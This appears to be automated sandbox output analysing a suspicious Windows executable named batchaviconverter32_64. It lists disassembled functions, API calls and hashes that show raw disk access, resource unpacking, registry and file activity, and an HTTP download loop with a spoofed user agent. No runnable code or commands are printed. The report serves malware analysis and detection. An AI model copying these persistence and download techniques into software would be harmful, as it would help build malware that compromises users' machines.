                                                              • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                              • String ID: \\.\PhysicalDrive0
                                                              • API String ID: 4026078076-1180397377
                                                              • Opcode ID: a2e68a95d94bbc6a40bee8a11280b17da373fae52957672b226b91710cefcd17
                                                              • Instruction ID: c07866d4b4e887281577b2397114bebd63d98cfae9bba907e2345ee80fd6f57b
                                                              • Opcode Fuzzy Hash: a2e68a95d94bbc6a40bee8a11280b17da373fae52957672b226b91710cefcd17
                                                              • Instruction Fuzzy Hash: 00316D71D01118EACB21EFA5CD849EFBBB9FF41750F20417AE515B22A0E3786E45CB98
                                                              Function 02DC79DA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 102fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 909 2dc79da-2def359 ReadFile 911 2df5a64-2df6dad 909->911
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002DBA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DBA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dba000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID: 3u-
                                                              • API String ID: 2738559852-451251065
                                                              • Opcode ID: 16116e5f9fe11f445e76e94f4ce39d25582c78189aade2958a6ffed0702cca10
                                                              • Instruction ID: 9c7a7a431b4c20768474a20ee3d65a76fb46c157fa72fadc5b3fccb933d3b21b
                                                              • Opcode Fuzzy Hash: 16116e5f9fe11f445e76e94f4ce39d25582c78189aade2958a6ffed0702cca10
                                                              • Instruction Fuzzy Hash: 3B3184F351C210EBD3086E69EC95ABFFBE8EB58220F16092DD6C6D3750D6755800CA96
                                                              Function 0040B846 Relevance: 3.0, APIs: 2, Instructions: 16stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040B1E7
                                                              • lstrcmpiW.KERNEL32 ref: 0040B846
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CtrlDispatcherServiceStartlstrcmpi
                                                              • String ID:
                                                              • API String ID: 369133424-0
                                                              • Opcode ID: 3ac7439ccd3d2d2a552c611123ee1ca9a0c00ba3a9cf8fa8e8ea2ccdf319ad21
                                                              • Instruction ID: 425363ba50cf9f58d8ddcc0d8d41c788735a15cde9808f692751c9cb04a70fb9
                                                              • Opcode Fuzzy Hash: 3ac7439ccd3d2d2a552c611123ee1ca9a0c00ba3a9cf8fa8e8ea2ccdf319ad21
                                                              • Instruction Fuzzy Hash: 51D05E30948105DBDB109FA1CA4C96A367CEA053447204073E80AF11D2E77CDA12EA5F
                                                              Function 02D87BA0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 91sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 513 2d87ba0-2d87bc2 514 2d87bc4-2d87bd2 513->514 515 2d87b46 call 2d8534d 513->515 516 2d87be0-2d87bf1 514->516 517 2d87bd4-2d87bde 514->517 519 2d87b4b-2d87b52 call 2d92ea4 515->519 522 2d87bf3-2d87c04 516->522 523 2d87b95-2d87b98 516->523 517->516 525 2d866f0-2d866f2 519->525 527 2d866fb-2d866fd 525->527 528 2d866f4-2d866f9 525->528 529 2d8670a-2d8673e RtlEnterCriticalSection RtlLeaveCriticalSection 527->529 530 2d866ff 527->530 531 2d86704 Sleep 528->531 532 2d8678e 529->532 533 2d86740-2d8674c 529->533 530->531 531->529 535 2d86792-2d872bf InternetOpenA 532->535 533->532 534 2d8674e-2d8675b 533->534 536 2d8675d-2d86761 534->536 537 2d86763-2d86764 534->537 540 2d87385-2d8738b 535->540 541 2d872c5-2d8733c InternetSetOptionA * 3 call 2d94a20 InternetOpenUrlA 535->541 539 2d86768-2d8678c call 2d94a20 * 2 536->539 537->539 539->535 542 2d8738d-2d87393 540->542 543 2d873a7-2d873b5 540->543 554 2d8737e-2d8737f InternetCloseHandle 541->554 555 2d8733e 541->555 546 2d87399-2d873a6 call 2d853ec 542->546 547 2d87395-2d87397 542->547 543->525 549 2d873bb-2d873df call 2d94a20 call 2d8439c 543->549 546->543 547->543 549->525 564 2d873e5-2d87413 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d9226c 549->564 554->540 559 2d87342-2d87368 InternetReadFile 555->559 560 2d8736a-2d87371 559->560 561 2d87373-2d8737a InternetCloseHandle 559->561 560->559 561->554 567 2d87469-2d87484 call 2d9226c 564->567 568 2d87415-2d87427 call 2d9226c 564->568 573 2d8748a-2d8748c 567->573 574 2d8773e-2d87750 call 2d9226c 567->574 568->567 575 2d87429-2d8743b call 2d9226c 568->575 573->574 576 2d87492-2d87544 call 2d92edc RtlEnterCriticalSection RtlLeaveCriticalSection call 2d94a20 * 5 call 2d8439c * 2 573->576 583 2d87799-2d877ab call 2d9226c 574->583 584 2d87752-2d87754 574->584 575->567 585 2d8743d-2d8744f call 2d9226c 575->585 638 2d87581 576->638 639 2d87546-2d87548 576->639 596 2d877cc-2d877de call 2d9226c 583->596 597 2d877ad-2d877bb call 2d861f1 call 2d862ff 583->597 584->583 587 2d87756-2d87794 call 2d94a20 RtlEnterCriticalSection RtlLeaveCriticalSection 584->587 585->567 598 2d87451-2d87463 call 2d9226c 585->598 587->525 607 2d87afc-2d87b0e call 2d9226c 596->607 608 2d877e4-2d877e6 596->608 614 2d877c0-2d877c7 call 2d8640a 597->614 598->525 598->567 607->525 620 2d87b14-2d87b42 call 2d92edc call 2d94a20 call 2d8439c 607->620 608->607 612 2d877ec-2d87803 call 2d8439c 608->612 612->525 624 2d87809-2d878d7 call 2d92348 call 2d81ba7 612->624 614->525 620->519 646 2d87b44 620->646 641 2d878d9 call 2d8143f 624->641 642 2d878de-2d878ff RtlEnterCriticalSection 624->642 647 2d87585-2d875b3 call 2d92edc call 2d94a20 call 2d8439c 638->647 639->638 645 2d8754a-2d8755c call 2d9226c 639->645 641->642 643 2d8790b-2d8796f RtlLeaveCriticalSection call 2d83c67 call 2d83d7e call 2d8826d 642->643 644 2d87901-2d87908 642->644 668 2d87ae3-2d87af7 call 2d88f35 643->668 669 2d87975-2d879bd call 2d8a657 643->669 644->643 645->638 656 2d8755e-2d8757f call 2d8439c 645->656 646->515 666 2d875f4-2d875fd call 2d92ea4 647->666 667 2d875b5-2d875c4 call 2d93516 647->667 656->647 678 2d87603-2d8761b call 2d93a7c 666->678 679 2d87734-2d87737 666->679 667->666 680 2d875c6 667->680 668->525 681 2d87aad-2d87ade call 2d8831c call 2d833b2 669->681 682 2d879c3-2d879ca 669->682 691 2d8761d-2d87625 call 2d89669 678->691 692 2d87627 678->692 679->574 684 2d875cb-2d875dd call 2d92780 680->684 681->668 686 2d879cd-2d879d2 682->686 699 2d875df 684->699 700 2d875e2-2d875f2 call 2d93516 684->700 686->686 690 2d879d4-2d87a1f call 2d8a657 686->690 690->681 701 2d87a25-2d87a2b 690->701 698 2d87629-2d876e1 call 2d8a781 call 2d83863 call 2d85119 call 2d83863 call 2d8aa27 call 2d8ab41 691->698 692->698 724 2d876e8-2d87713 Sleep call 2d91820 698->724 725 2d876e3 call 2d8380b 698->725 699->700 700->666 700->684 705 2d87a2e-2d87a33 701->705 705->705 708 2d87a35-2d87a70 call 2d8a657 705->708 708->681 714 2d87a72-2d87aac call 2d8d049 708->714 714->681 729 2d8771f-2d8772d 724->729 730 2d87715-2d8771e call 2d84100 724->730 725->724 729->679 732 2d8772f call 2d8380b 729->732 730->729 732->679
                                                              APIs
                                                              Strings
                                                              • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02D86735
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection_memset$EnterLeaveSleep_free
                                                              • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                              • API String ID: 1317429769-1923541051
                                                              • Opcode ID: 75549abe72c9e0a5a579ca6c86203ca24752609a14dfd15c62e2bba4a0929338
                                                              • Instruction ID: 5fbf05a86f4bbd25860b3826cc2f5fb313720dd416d4f50da790d3619a57e284
                                                              • Opcode Fuzzy Hash: 75549abe72c9e0a5a579ca6c86203ca24752609a14dfd15c62e2bba4a0929338
                                                              • Instruction Fuzzy Hash: 3431E43694C3809BE310EB70AC45A9EBBA6EF4A720F244859E582AB340D721DC01DAD6
                                                              Function 00401F64 Relevance: 12.1, APIs: 8, Instructions: 121memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 761 401f64-401f84 FindResourceA 762 401f86-401f9d GetLastError SizeofResource 761->762 763 401f9f-401fa1 761->763 762->763 764 401fa6-401fec LoadResource LockResource GlobalAlloc call 402800 * 2 762->764 765 402096-40209a 763->765 770 401fee-401ff9 764->770 770->770 771 401ffb-402003 GetTickCount 770->771 772 402032-402038 771->772 773 402005-402007 771->773 774 402053-402083 GlobalAlloc call 401c26 772->774 776 40203a-40204a 772->776 773->774 775 402009-40200f 773->775 781 402088-402093 774->781 775->774 777 402011-402023 775->777 778 40204c 776->778 779 40204e-402051 776->779 782 402025 777->782 783 402027-40202a 777->783 778->779 779->774 779->776 781->765 782->783 783->777 784 40202c-40202e 783->784 784->775 785 402030 784->785 785->774
                                                              APIs
                                                              • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                              • GetLastError.KERNEL32 ref: 00401F86
                                                              • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                              • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                              • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                              • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
                                                              • GetTickCount.KERNEL32 ref: 00401FFB
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                              • String ID:
                                                              • API String ID: 564119183-0
                                                              • Opcode ID: c339dbb3d4f54c4bfe23240511e1faf338c1a50a53de60f6f0a2310917010a4d
                                                              • Instruction ID: 3f373f2fe47a9e58058ec223940fe379f908771e1a31376a549d0366c6000c22
                                                              • Opcode Fuzzy Hash: c339dbb3d4f54c4bfe23240511e1faf338c1a50a53de60f6f0a2310917010a4d
                                                              • Instruction Fuzzy Hash: D0314C32A402516FDB109FB99E889AF7FB8EF45344B10807AFA46F7291D6748841C7A8
                                                              Function 00402D60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetVersion.KERNEL32 ref: 00402D86
                                                                • Part of subcall function 004039F0: HeapCreate.KERNEL32(00000000,00001000,00000000,00402DBF,00000000), ref: 00403A01
                                                                • Part of subcall function 004039F0: HeapDestroy.KERNEL32 ref: 00403A40
                                                              • GetCommandLineA.KERNEL32 ref: 00402DD4
                                                              • GetStartupInfoA.KERNEL32(?), ref: 00402DFF
                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402E22
                                                                • Part of subcall function 00402E7B: ExitProcess.KERNEL32 ref: 00402E98
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                              • String ID: 5s
                                                              • API String ID: 2057626494-2399958700
                                                              • Opcode ID: 9e286e5f9a377e3797ece88135c359dedbbb575cc14907a13f37508a60b21901
                                                              • Instruction ID: f31f1ce04d2051e6b9e8acf883bbbbaa5bd69f55a1c9941ff1c46623f1a3e60c
                                                              • Opcode Fuzzy Hash: 9e286e5f9a377e3797ece88135c359dedbbb575cc14907a13f37508a60b21901
                                                              • Instruction Fuzzy Hash: AD219FB0840715AADB04EFA6DE09A6E7BB8EB04704F10413FF502B72E2DB388510CB59
                                                              Function 0040B2B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 893 40b2b6-40b434 RegQueryValueExA 895 40b950 893->895 896 40b956 895->896 897 40234f-402680 RegCloseKey 895->897 899 40b258-40b6a6 call 402c80 * 2 897->899 899->895
                                                              APIs
                                                              • RegCloseKey.KERNEL32(?), ref: 00402675
                                                              • RegQueryValueExA.KERNEL32(?), ref: 0040B42C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue
                                                              • String ID: DKIM Authenticator lib 9.11.45
                                                              • API String ID: 3356406503-992513482
                                                              • Opcode ID: 9f3ab80b34013c7ae2a3ba5b718e8f9b7d011b98ac830053569414634423122b
                                                              • Instruction ID: ea9df7bfd44bb0946ed55302e346c09ade04677403cacf3b491b9d5a1f41658c
                                                              • Opcode Fuzzy Hash: 9f3ab80b34013c7ae2a3ba5b718e8f9b7d011b98ac830053569414634423122b
                                                              • Instruction Fuzzy Hash: 78E01230949015E7D6012B604F0DD7F2A64EE84304B2589BBE613750D1D77D551376DF
                                                              Function 02D81AA9 Relevance: 4.5, APIs: 3, Instructions: 18networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 906 2d81aa9-2d81ac3 InterlockedIncrement 907 2d81add-2d81ae0 906->907 908 2d81ac5-2d81ad7 WSAStartup InterlockedExchange 906->908 908->907
                                                              APIs
                                                              • InterlockedIncrement.KERNEL32(02DB727C), ref: 02D81ABA
                                                              • WSAStartup.WS2_32(00000002,00000000), ref: 02D81ACB
                                                              • InterlockedExchange.KERNEL32(02DB7280,00000000), ref: 02D81AD7
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Interlocked$ExchangeIncrementStartup
                                                              • String ID:
                                                              • API String ID: 1856147945-0
                                                              • Opcode ID: 05edf98d07eeb225bd3631bde7ae6c6ea3147fa524883abe2c18c26a00d6daea
                                                              • Instruction ID: dbaa2c6c46acb6b5f89366b3ea95fbdfc96a1b4b6f85adf9a5c7b80794bc20b4
                                                              • Opcode Fuzzy Hash: 05edf98d07eeb225bd3631bde7ae6c6ea3147fa524883abe2c18c26a00d6daea
                                                              • Instruction Fuzzy Hash: F0D05E32E842049BF22176E0BD0FEBCF76CEB05611F100651FC6AC03C0EB519D2885AA
                                                              Function 00402343 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 914 402343-402344 915 402346-402350 914->915 915->915 916 402352 915->916 917 402675-402680 RegCloseKey 916->917 918 40b258-40b950 call 402c80 * 2 917->918 926 40b956 918->926 927 40234f-402352 918->927 927->917
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID: DKIM Authenticator lib 9.11.45
                                                              • API String ID: 3535843008-992513482
                                                              • Opcode ID: 71178b521464b22cec81154ab39d6b61894fd2ef990d7a80b8901f9365d8adb4
                                                              • Instruction ID: 140215818bd542184c6db6de9533f9e15bd1c8d3566ca8fcfb9ac77aee970921
                                                              • Opcode Fuzzy Hash: 71178b521464b22cec81154ab39d6b61894fd2ef990d7a80b8901f9365d8adb4
                                                              • Instruction Fuzzy Hash: F4D02E2081E402A2E02023205F5ECAF1ECCCC6A308B2186BBFF02710C183BC401351EF
                                                              Function 00402227 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 928 402227-402232 929 402234-402239 928->929 930 402298-40b5dc RegOpenKeyExA 928->930 929->930
                                                              APIs
                                                              • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders), ref: 0040B5D6
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040229B
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                              • API String ID: 71445658-2036018995
                                                              • Opcode ID: 14becb601f24dd6e911325f749a7f7000fa81a16bc6822c01ec34a94a7934bab
                                                              • Instruction ID: da86c39f3427503fa6fa6f990265045fabc2e28eb1ecfff1a0a46ed3c673e4a6
                                                              • Opcode Fuzzy Hash: 14becb601f24dd6e911325f749a7f7000fa81a16bc6822c01ec34a94a7934bab
                                                              • Instruction Fuzzy Hash: B2D05B2018C655DAD3114F518E593A57B50EF11B0C73085EE9893B71D2C7B54466D35F
                                                              Function 00402151 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CopyFile
                                                              • String ID: .exe
                                                              • API String ID: 1304948518-4119554291
                                                              • Opcode ID: c9b541b096ac0a48a00383a63f0ec283f01a2ba28950dda0ec536793447ef056
                                                              • Instruction ID: 979c920877eab106eb47a83716a27eaf5ee87f07d3e7c28683a3c093931a9752
                                                              • Opcode Fuzzy Hash: c9b541b096ac0a48a00383a63f0ec283f01a2ba28950dda0ec536793447ef056
                                                              • Instruction Fuzzy Hash: F7D0C975949115E7E10066655F4EE9A666C8A08748B2084B7BA06B10C1D6BC5206A5FF
                                                              Function 02DBFA2F Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 139sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002DBA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DBA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dba000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: [8f5
                                                              • API String ID: 3472027048-1915022229
                                                              • Opcode ID: 4077903a7ddeb9f38e2dc7d4c6c6d4cbd64e2366f24940343d4e4aa997f81959
                                                              • Instruction ID: d905575ec0926795751f2d95ab1bb5c65efac879a45a5eb1ac6c5f2253a70e5f
                                                              • Opcode Fuzzy Hash: 4077903a7ddeb9f38e2dc7d4c6c6d4cbd64e2366f24940343d4e4aa997f81959
                                                              • Instruction Fuzzy Hash: E6414BB254C704AFD305BF19EC95ABAFBE8EB44710F02492DEAC543740EA356840CB9B
                                                              Function 0040B2DA Relevance: 3.0, APIs: 2, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c15c9526de40452988b7871925f212181b2a0656ce9b97c9c85048b8dbc2fb6
                                                              • Instruction ID: cb2e9ac313128095a71e44c717dfbe73d0fc4547dac7c95aa83db207b15f171e
                                                              • Opcode Fuzzy Hash: 6c15c9526de40452988b7871925f212181b2a0656ce9b97c9c85048b8dbc2fb6
                                                              • Instruction Fuzzy Hash: 2901102204C682DBC3229B708A2D1E63F68EF0031072041FB8182EB2D3C7BC200393DD
                                                              Function 004039F0 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • HeapCreate.KERNEL32(00000000,00001000,00000000,00402DBF,00000000), ref: 00403A01
                                                                • Part of subcall function 004038A8: GetVersionExA.KERNEL32 ref: 004038C7
                                                              • HeapDestroy.KERNEL32 ref: 00403A40
                                                                • Part of subcall function 00403DC7: HeapAlloc.KERNEL32(00000000,00000140,00403A29,000003F8), ref: 00403DD4
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocCreateDestroyVersion
                                                              • String ID:
                                                              • API String ID: 2507506473-0
                                                              • Opcode ID: 08f14aee262382775140a5fb38b16d88e88289f6ea168ffb6a246c9e47cbf934
                                                              • Instruction ID: 5dadef9d12e489db140da5c14b34350ea54a5b880f3286d9e4ff1a1591b79aa3
                                                              • Opcode Fuzzy Hash: 08f14aee262382775140a5fb38b16d88e88289f6ea168ffb6a246c9e47cbf934
                                                              • Instruction Fuzzy Hash: 04F065707553016ADB24EF705E4676B3DD8AB80B53F10443BF541F41E0EB7C8690991A
                                                              Function 004021EA Relevance: 3.0, APIs: 2, Instructions: 6registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CloseValue
                                                              • String ID:
                                                              • API String ID: 3132538880-0
                                                              • Opcode ID: 8dd3f2575dd90e2cb18feb9ee4b943cc514a0b17e9529a5695a78f9b8cbfa6c0
                                                              • Instruction ID: b02079ab183da12d8d24e84b513181e84d706f9db74907cb040d883337907184
                                                              • Opcode Fuzzy Hash: 8dd3f2575dd90e2cb18feb9ee4b943cc514a0b17e9529a5695a78f9b8cbfa6c0
                                                              • Instruction Fuzzy Hash: E6B09231958000EBCB055BE0EE085283F71FB08301B124031E207704B2C7352962AF9F
                                                              Function 02E1E864 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002DBA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DBA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dba000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 5f3154d1a41598e8993a2276050e7f9040ebf786f0a5adafcea011883b321f86
                                                              • Instruction ID: cab705d737d828d3e0ae5d8e6426ddb64e255dcbffe3a8b254c5fec929988430
                                                              • Opcode Fuzzy Hash: 5f3154d1a41598e8993a2276050e7f9040ebf786f0a5adafcea011883b321f86
                                                              • Instruction Fuzzy Hash: FC019BB36082209FD3246A6DE89ABBEBB94EF40774F06053DE7C546744E5701440C6D6
                                                              Function 004022BC Relevance: 1.5, APIs: 1, Instructions: 30libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExA.KERNEL32(?), ref: 00402286
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 25c27a79d5e8c5d4907328dd030ad379705e51eba7445cda96f7cf4e48879fa5
                                                              • Instruction ID: 8679871482aaffd31fcc0a8903d333394e124a61a7c03b662124064b65c278b1
                                                              • Opcode Fuzzy Hash: 25c27a79d5e8c5d4907328dd030ad379705e51eba7445cda96f7cf4e48879fa5
                                                              • Instruction Fuzzy Hash: BBF08C71201216CBEB14CF14C9C466137A4FF05750B24047AEC01EB2C4E378D8159B9E
                                                              Function 02DBEB47 Relevance: 1.5, APIs: 1, Instructions: 8fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002DBA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DBA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dba000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 2b89a879b32ab2df01939177e93c88ab5c1f8bd73f17d56ca26e8c0698ac018b
                                                              • Instruction ID: 6133aa3c473c590e42fea8577e79632c399acb6f34aeac207ba4191e6f090f26
                                                              • Opcode Fuzzy Hash: 2b89a879b32ab2df01939177e93c88ab5c1f8bd73f17d56ca26e8c0698ac018b
                                                              • Instruction Fuzzy Hash: 21C02B33C0C300CFC3410720542426837F02400151B370483E0B377381D220EC08C3CD
                                                              Function 0040B2CD Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory
                                                              • String ID:
                                                              • API String ID: 4241100979-0
                                                              • Opcode ID: f26b9ed8aa9ce9717b0f3a2329cfd49bd6067e7a935878d9416f2b08596b86bf
                                                              • Instruction ID: c060ff00f01b497ab3d7f79e6a554ece389e235889c97c25d1c293a4ca7d7c2f
                                                              • Opcode Fuzzy Hash: f26b9ed8aa9ce9717b0f3a2329cfd49bd6067e7a935878d9416f2b08596b86bf
                                                              • Instruction Fuzzy Hash: 2AA011280EA030F3C00223A00E0ACAAA828A80A3023300233B303B08C002FC0002A3BF
